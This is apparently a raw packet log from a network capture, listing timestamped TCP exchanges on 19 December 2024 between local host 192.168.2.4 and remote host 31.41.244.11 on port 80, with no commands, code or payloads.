                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.584747076 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.584799051 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.585671902 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.585731983 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.585782051 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.585835934 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.586693048 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.586761951 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.586827040 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.586884022 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.587852001 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.587915897 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.587960958 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.588015079 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.588814020 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.588927031 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.589005947 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.589060068 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.589823961 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.589879036 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.589978933 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.590037107 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.590864897 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.590920925 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.590980053 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.591031075 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.591922998 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.591974020 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.592122078 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.592181921 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.592951059 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.593031883 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.593086004 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.593142033 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.594003916 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.594078064 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.594130993 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.594182014 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.595068932 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.595107079 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.595128059 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.595159054 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.596090078 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.596162081 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.596199036 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.596272945 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.597100973 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.597167015 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.597177982 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.597232103 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.598184109 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.598236084 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.598309994 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.598362923 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.599189997 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.599244118 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.599334955 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.599433899 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.600275993 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.600356102 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.600357056 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.600409031 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.601264954 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.601326942 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.601387978 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.601442099 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.602339983 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.602390051 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.602456093 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.602511883 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.603365898 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.603431940 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.741065025 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.741149902 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.741203070 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.741282940 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.741286993 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.741318941 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.741405964 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.741836071 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.741892099 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.741894007 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.742010117 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.742912054 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.743052006 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.743824005 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.743946075 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.744009018 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.744074106 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.744232893 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.745006084 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.745102882 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.745140076 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.745213985 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.746027946 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.746105909 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.746167898 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.746233940 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.747081041 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.747204065 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.747276068 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.748116970 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.748218060 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.748545885 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.749147892 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.749269009 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.749298096 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.749351025 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.750189066 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.750262022 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.750300884 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.750380993 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.751223087 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.751332998 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.751395941 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.751780987 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.752274036 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.752419949 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.752453089 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.752665043 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.753319979 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.753397942 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.753451109 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.753516912 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.754373074 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.754440069 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.754487038 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.754654884 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.755404949 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.755510092 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.755599022 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.756445885 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.756547928 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.756568909 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.756840944 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.757488012 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.757611036 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.757638931 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.758258104 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.758514881 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.758641958 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.758656025 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.758759022 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.759604931 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.759660006 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.759689093 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.759720087 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.760591030 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.760716915 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.760731936 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.760771036 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.761616945 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.761785030 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.761944056 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.762669086 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.762765884 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.762799025 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.762862921 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.763720036 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.763787031 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.763848066 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.763991117 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.764744043 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.764828920 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.764884949 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.764947891 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.765825987 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.765937090 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.765959978 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.766000986 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.766832113 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.766915083 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.767021894 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.767088890 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.767894983 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.767962933 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.768013954 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.768076897 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.768920898 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.768990040 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.769037962 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.769107103 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.769957066 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.770064116 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.770251036 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.770988941 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.771121025 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.771281958 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.772069931 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.772146940 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.772160053 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.772226095 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.773106098 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.773231030 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.773258924 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.773292065 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.774166107 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.774261951 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.774318933 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.774404049 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.775176048 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.775243998 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.775289059 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.775353909 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.776201010 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.776274920 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.776331902 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.776396990 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.777256966 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.777368069 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.777384996 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.777447939 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.778295994 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.778378963 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.778415918 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.778496027 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.779373884 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.779441118 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.779464960 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.779532909 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.780365944 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.780478954 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.780531883 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.781507015 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.781629086 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.781656981 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.781966925 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.782460928 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.782531977 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.782548904 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.782608032 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.783488035 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.783617020 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.783637047 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.784041882 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.784537077 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.784586906 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.784620047 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.785490990 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.785574913 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.785670996 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.785691977 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.785718918 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.786590099 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.786664009 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.786706924 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.786750078 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.787626982 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.787733078 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.787753105 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.787812948 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.788681984 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.788726091 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.788795948 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.788892984 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.789707899 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.789777994 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.789782047 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.789840937 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.790766954 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.790828943 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.790869951 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.790926933 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.791789055 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.791898966 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.791919947 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.791987896 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.792844057 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.793009043 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.793036938 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.793082952 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.793889046 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.794012070 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.794143915 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.794934034 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.795017004 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.795026064 CET4978780192.168.2.431.41.244.11
